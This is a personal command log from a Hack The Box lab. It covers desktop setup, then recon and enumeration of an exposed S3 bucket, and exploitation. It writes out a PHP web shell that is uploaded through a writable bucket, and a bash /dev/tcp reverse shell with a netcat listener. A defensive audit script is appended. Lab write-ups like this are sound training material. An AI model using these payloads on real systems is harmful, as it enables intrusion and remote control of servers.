
HTB Challenge Commands - December 24, 2025

System Setup & Package Management

Initial Updates & Editor Setup

sudo apt update
sudo update-alternatives --config editor
visudo

Vim Installation & Configuration

sudo apt install vim
sudo apt-get update && sudo apt-get install vim
sudo apt install vim-common
which vim
vi .bashrc
source .bashrc

Application Launchers

sudo apt install ulauncher
sudo apt install synapse
synapse

Git Installation

sudo apt install git

i3 Window Manager Setup

sudo apt install i3 polybar rofi picom nitrogen lxappearance

Create i3 Configuration Structure

cd ~/.config/
mkdir i3 polybar picom rofi

i3 Config Files

vim i3/config
vim polybar/launch.sh
chmod +x ~/.config/polybar/launch.sh
vim polybar/config.ini
vim picom/picom.conf
vim rofi/config.rasi

Set Wallpaper

nitrogen

i3 Keybindings Reference

cat > ~/i3-keybinds.md << 'EOF'
# i3 Keybindings Reference
**Mod key = Command (⌘) on MacBook**

## Core Commands
- `Mod+Enter` - open terminal
- `Mod+d` - app launcher (dmenu/rofi)
- `Mod+Shift+q` - kill focused window
- `Mod+Shift+e` - exit i3
- `Mod+Shift+r` - restart i3 (reload config)
- `Mod+Shift+c` - reload config without restart

## Window Navigation
- `Mod+h/j/k/l` - move focus left/down/up/right (vim style)
- `Mod+arrow keys` - also works for focus
- `Mod+Shift+h/j/k/l` - move window left/down/up/right
- `Mod+Shift+arrows` - also moves windows

## Workspaces
- `Mod+1` through `Mod+9` - switch to workspace 1-9
- `Mod+Shift+1` through `Mod+9` - move window to workspace

## Layout
- `Mod+e` - toggle split horizontal/vertical
- `Mod+s` - stacking layout
- `Mod+w` - tabbed layout
- `Mod+f` - fullscreen toggle
- `Mod+Shift+space` - toggle floating

## Splitting
- `Mod+h` - split horizontal
- `Mod+v` - split vertical

## Resizing
- `Mod+r` - enter resize mode
- Then `h/j/k/l` or arrows to resize
- `Esc` or `Enter` - exit resize mode
EOF

Clean i3 Setup

cd ~
mkdir -p i3-setup/{i3,polybar,picom,rofi}
cd i3-setup
rm -rf ~/.config/i3 ~/.config/polybar ~/.config/picom ~/.config/rofi

Theme Setup

Dracula Theme Installation

cd ~/Downloads
wget https://github.com/dracula/gtk/archive/master.zip
unzip master.zip
mkdir -p ~/.themes
cp -r gtk-master ~/.themes/Dracula
vim ~/.themes/Dracula/index.theme

Dracula Icons

git clone https://github.com/dracula/gtk.git ~/Downloads/dracula-icons
sudo cp -r ~/Downloads/dracula-icons/kde/cursors/Dracula-cursors /usr/share/icons/

HTB Challenge - Reconnaissance

Network Scanning

nmap -sV -sT 10.129.227.248
nmap -sV -sT -p- 10.129.227.248
nmap -sV -sT -p- s3.thetoppers.htb

Hosts File Configuration

sudo vim /etc/hosts
# Added: 10.129.227.248 s3.thetoppers.htb thetoppers.htb
ping s3.thetoppers.htb

Initial Web Enumeration

curl s3.thetoppers.htb
curl -s http://thetoppers.htb | wc -c
curl http://s3.thetoppers.htb/thetoppers.htb/index.php
curl http://thetoppers.htb/action_page.php

Directory & Subdomain Enumeration

Gobuster Installation & Usage

sudo apt install gobuster

Directory Enumeration

gobuster dir -u http://s3.thetoppers.htb -w ~/SecLists/Discovery/Web-Content/common.txt
gobuster dir -u http://thetoppers.htb -w ~/SecLists/Discovery/Web-Content/common.txt

Subdomain Enumeration

gobuster dns -d thetoppers.htb -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

S3 Bucket Enumeration

gobuster s3 -h
gobuster s3 -w ~/SecLists/Discovery/Web-Content/common.txt

Fuzzing Tools

ffuf Installation & Usage

sudo apt install ffuf

Subdomain Fuzzing

ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.thetoppers.htb
ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb" -mc all
ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb" -mc all -fs 11952

wfuzz Installation & Usage

sudo apt install wfuzz
wfuzz -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.thetoppers.htb" http://10.129.227.248

Wordlists Setup

SecLists Installation

sudo apt install seclists  # Failed - package not in repos
sudo vim /etc/apt/sources.list  # Added proper repos
cd ~
git clone https://github.com/danielmiessler/SecLists.git

AWS CLI & S3 Bucket Enumeration

AWS CLI Setup

sudo apt install awscli
aws configure
# Access Key: test
# Secret Key: test
# Region: us-east-1
# Format: json

S3 Bucket Discovery

aws s3 ls --endpoint-url http://s3.thetoppers.htb
# Found: thetoppers.htb bucket

S3 Bucket Content Enumeration

aws s3 ls s3://thetoppers.htb --endpoint-url http://s3.thetoppers.htb --recursive
aws s3 ls s3://thetoppers.htb/ --endpoint-url http://s3.thetoppers.htb --recursive
aws s3 ls s3://thetoppers.htb/ --endpoint-url http://s3.thetoppers.htb --recursive --include ".*"

Download S3 Bucket Contents

aws s3 sync s3://thetoppers.htb . --endpoint-url http://s3.thetoppers.htb

S3 API Operations

aws s3api get-bucket-acl --bucket thetoppers.htb --endpoint-url http://s3.thetoppers.htb
aws s3api list-object-versions --bucket thetoppers.htb --endpoint-url http://s3.thetoppers.htb
aws s3api get-bucket-tagging --bucket thetoppers.htb --endpoint-url http://s3.thetoppers.htb
aws s3api list-objects --bucket thetoppers.htb --endpoint-url http://s3.thetoppers.htb

File Analysis

Search Downloaded Files

ls
cat index.php
cat index.php | grep email
cat index.php | grep flag
vim index.php
cat .htaccess

Image Files

ls images/
cd images/
open band2.jpg
open band3.jpg
open final.jpg
cd ..

Search for Sensitive Files

find . -name "*flag*"
find . -name "*.pem" -o -name "*key*" -o -name "id_rsa*"
aws s3 ls s3://thetoppers.htb/ --endpoint-url http://s3.thetoppers.htb --recursive | grep -i "key\|ssh\|pem"

Exploitation - PHP Web Shell

File Upload Test

touch test.txt
aws s3 cp test.txt s3://thetoppers.htb/test.txt --endpoint-url http://s3.thetoppers.htb

PHP Web Shell Creation & Upload

echo "<?php system(\$_GET['cmd']); ?>" > shell.php
aws s3 cp shell.php s3://thetoppers.htb/shell.php --endpoint-url http://s3.thetoppers.htb

Remote Command Execution

curl 'http://thetoppers.htb/shell.php?cmd=ls'
curl 'http://thetoppers.htb/shell.php?cmd=ls%20-a'
curl 'http://thetoppers.htb/shell.php?cmd=ll'
curl 'http://thetoppers.htb/shell.php?cmd=cat%20flag.txt'

Reverse Shell Attempt

Check VPN IP

ip addr show tun0 | grep inet

Create Reverse Shell

cat > shell.php << 'EOF'
<?php
system("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");
?>
EOF

vim shell.php  # Edit to add actual IP

Setup Listener

nc -lvnp 4444

SSH Attempts

SSH Connection Attempts

ssh root@10.129.227.248

Utilities

Screenshots

mate-screenshot

Browser

firefox

Command History Export

mkdir -p ~/htb_commands_history
history > ~/htb_commands_history/htb_commands_dec24.txt

Key Findings

  1. S3 Bucket Discovery: Found thetoppers.htb bucket via AWS CLI
  2. Email Found: mail@thetoppers.htb in index.php contact section
  3. Subdomain Discovery: s3.thetoppers.htb via vhost fuzzing
  4. File Upload: S3 bucket allows file uploads
  5. RCE Achieved: PHP web shell uploaded and executed successfully
  6. Flag Location: Flag located via ls ../ command through web shell

Lessons Learned

  • Always test uploaded web shells immediately with simple commands
  • LocalStack S3 emulator behaves differently than real AWS S3
  • Vhost fuzzing (-H "Host: FUZZ") works when DNS enumeration fails
  • AWS CLI is essential for S3 bucket enumeration and manipulation
  • File upload to S3 + web execution = easy RCE
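
Defender's view of the last lesson, as an added example that is not part of the original notes: when a writable bucket is also served as a PHP-enabled web root, any new script object is executable code. The sketch below audits a listing in the `aws s3 ls --recursive` output format against a known-good baseline. The function names, baseline contents and sample listing are assumptions constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: flag server-executable objects in a bucket listing that are
# absent from a known-good baseline. Input is `aws s3 ls --recursive` output.

# Print object keys from a listing on stdin.
# Each line is: date, time, size, key (keys may contain spaces).
listing_keys() {
  awk 'NF >= 4 { sub(/^[^ ]+ +[^ ]+ +[0-9]+ /, ""); print }'
}

# Print keys that a PHP-enabled web server would execute (.php, .phtml, .phar)
# or that can change handler mappings (.htaccess), unless the key appears in
# the baseline file given as $1 (one expected key per line).
audit_bucket_listing() {
  local baseline="$1"
  listing_keys |
    grep -Ei '(\.(php[0-9]?|phtml|phar)|(^|/)\.htaccess)$' |
    grep -Fxv -f "$baseline" || true
}

# Constructed sample listing (dates and sizes are made up).
sample_listing() {
  cat <<'EOF'
2025-12-24 09:00:00          0 .htaccess
2025-12-24 09:00:00      11000 index.php
2025-12-24 09:00:00      90000 images/band2.jpg
2025-12-24 11:42:10          0 test.txt
2025-12-24 11:45:31         32 shell.php
EOF
}

# Constructed baseline: the objects the site owner expects to be executable.
sample_baseline() { printf '%s\n' '.htaccess' 'index.php'; }

run_demo() {
  local base
  base=$(mktemp)
  sample_baseline > "$base"
  sample_listing | audit_bucket_listing "$base"
  rm -f "$base"
}

run_demo
```

Any key this prints deserves investigation. The durable fix is to deny anonymous writes to the bucket and to serve bucket content from a path where the web server does not execute scripts.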